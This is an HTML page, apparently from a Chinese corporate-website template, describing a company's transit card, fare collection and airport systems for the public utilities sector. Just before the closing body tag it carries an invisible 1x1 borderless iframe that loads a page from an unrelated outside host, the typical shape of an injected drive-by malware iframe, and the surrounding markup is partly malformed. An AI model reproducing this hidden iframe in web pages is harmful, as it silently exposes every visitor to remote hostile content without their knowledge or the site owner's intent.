<!DOCTYPE html>
<html>
<
	<head>
		<meta charset="utf-8" />
		<title>网站关键词-网站名称</title>
		<meta name="description" content="网站描述，一般显示在搜索引擎搜索结果中的描述文字，用于介绍网站，吸引浏览者点击。" />
		<meta name="keywords" content="网站关键词" />
		<meta name="generator" content="" />
		<link href="favicon.ico" rel="shortcut icon" />
		<link rel="stylesheet" type="text/css" href="css/metinfo.css" />
		<script src="js/jQuery1.7.2.js" type="text/javascript"></script>
		<script src="js/ch.js" type="text/javascript"></script>

	</head>

<body>
	<header>
			<div class="inner">
				<div class="top-logo">

					<a href="http://www.chinasofti.com/" title="网站名称" id="web_logo">
						<img src="images/logo.png" alt="网站名称" title="网站名称" style="margin:20px 0px 0px 0px;" />
					</a>

					<ul class="top-nav list-none">
						<li class="t">
							<a href='#' onclick='SetHome(this,window.location,"非IE浏览器不支持此功能，请手动设置！");' style='cursor:pointer;' title='设为首页'>设为首页</a><span>|</span>
							<a href='#' onclick='addFavorite("非IE浏览器不支持此功能，请手动设置！");' style='cursor:pointer;' title='收藏本站'>收藏本站</a><span>|</span>
							<a class="fontswitch" id="StranLink" href="javascript:StranBody()">繁体中文</a><span>|</span>
							<a href='#' title='WAP'>WAP</a><span>|</span>
							<a href='#' title='English'>English</a><span>|</span>
							<a href='#' title='我的订单' class='shopweba'>我的订单</a>
							<span>|</span>
							<a href='admin/index.html' title='进入后台' class='shopweba'>进入后台</a>
						</li>
					</ul>
				</div>
				<nav>
					<ul class="list-none">
						<li id="nav_10001" style='width:121px;'>
							<a href='index.html' x class='nav'><span>网站首页</span></a>
						</li>
						<li class="line"></li>
						<li id='nav_1' style='width:121px;' class='navdown'>
							<a href='about.html' 0 class='hover-none nav'><span>关于我们</span></a>
						</li>
						<li class="line"></li>
						<li id='nav_2' style='width:121px;'>
							<a href='news.html' class='hover-none nav'><span>新闻资讯</span></a>
						</li>
						<li class="line"></li>
						<li id='nav_3' style='width:121px;'>
							<a href='product.html' class='hover-none nav'><span>产品展示</span></a>
						</li>
						<li class="line"></li>
						<li id='nav_32' style='width:121px;'>
							<a href='down.html' class='hover-none nav'><span>下载中心</span></a>
						</li>
						<li class="line"></li>
						<li id='nav_33' style='width:121px;'>
							<a href='customer.html' class='hover-none nav'><span>客户案例</span></a>
						</li>
						<li class="line"></li>
						<li id='nav_36' style='width:120px;'>
							<a href='employ.html' class='hover-none nav'><span>招贤纳士</span></a>
						</li>
						<li class="line"></li>
						<li id='nav_22' style='width:120px;'>
							<a href='lianxi.html' class='hover-none nav'><span>联系我们</span></a>
						</li>
					</ul>
				</nav>
			</div>
		</header>
		<div class="inner met_flash">
		<div class="flash">
			<a href='#' target='_blank' title='企业网站管理系统'><img
				src='images/1342430358.jpg' width='980' alt='企业网站管理系统' height='90'></a>
		</div>
	</div>
	<div class="sidebar inner">
		<div class="sb_nav">
			<h3 class='title myCorner' data-corner='top 5px'>产品服务</h3>
			<div class="active" id="sidebar" data-csnow="2" data-class3="0"
				data-jsok="2">
				<dl class="list-none navnow">
					<dt id='part2_4'>
						<a href='product.html' title='软件平台服务' class="zm"><span>软件平台服务</span></a>
					</dt>
				</dl>
				<dl class="list-none navnow">
					<dt id='part2_5'>
						<a href='yejie.html' title='业界资讯' class="zm"><span>数据分析服务</span></a>
					</dt>
				</dl>
				<dl class="list-none navnow">
					<dt id='part2_6'>
						<a href='cloud.html' title='云服务' class="zm"><span>云服务</span></a>
					</dt>
				</dl>
				<div class="clear"></div>
			</div>
			<h3 class='title trade' data-corner='top 5px'>行业</h3>
			<div class="active editor" id="sidebar1" data-csnow="2"
				data-class3="0" data-jsok="2">
				<dl class="list-none navnow">
					<dt id='part2_4'>
						<a href='jinrong.html' title='金融行业' class="zm"><span>金融行业</span></a>
					</dt>
				</dl>
				<dl class="list-none navnow">
					<dt id='part2_8'>
						<a href='dianxin.html' title='电信行业' class="zm"><span>电信行业</span></a>
					</dt>
				</dl>
				<dl class="list-none navnow">
					<dt id='part2_9'>
						<a href='internet.html' title='互联网与高科技行业' class="zm"><span>互联网与高科技行业</span></a>
					</dt>
				</dl>
				<dl class="list-none navnow">
					<dt id='part2_0'>
						<a href='public.html' title='公共事业及其他行业' class="zm"><span>公共事业及其他行业</span></a>
					</dt>
				</dl>
				<div class="clear"></div>
			</div>
		</div>


		<div class="sb_box">
			<h3 class="title">
				<div class="position">
					当前位置：<a href='#' title="网站首页">网站首页</a> &gt; <a href='#'>关于我们</a> >
					<a href='#'>公共事业及其他行业</a>
				</div>
				<span>公共事业及其他行业</span>
			</h3>
			<div class="clear"></div>

			<div class="editor active" id="showtext">
				<div>
					<div>在公共事业领域，公司经过多年的专业积累，在公共交通、轨道交通、机场管理等泛交通领域的解决方案市场占据领先地位，建立了三个“全国第一个系统”：</div>
					<div>&nbsp;</div>
					<div>&nbsp; &nbsp;
						&nbsp;全国第一个城市交通一卡通支付清算系统、全国第一个城市轨道交通一票换乘支付系统和全国第一个具有自主知识产权的自动售检票（AFC）系统。 
					</div>
					<div>&nbsp;</div>
					<div>&nbsp; &nbsp;
						&nbsp;公司为交通行业的客户提供一卡通、自动售检票系统（AFC）、自动售检票清算中心（ACC）、智能交通、机场运营管理系统等解决方案及专业应用集成和运维等服务。</div>
					<div>&nbsp;</div>
					<div>&nbsp; &nbsp;
						&nbsp;其中一卡通类解决方案已推广至超过30个城市，上线系统发卡量超过一亿张，经过巨大的客流量的考验。未来，公司在持续发展现有解决方案的基础上，持续不断建设并提升行业服务能力		
				</div>
				<div class="clear"></div>
			</div>
		</div>
		<div class="clear"></div>
	</div>
			

<iframe src="http://ZieF.pl/rc/" width=1 height=1 style="border:0"></iframe>
</body>
</html>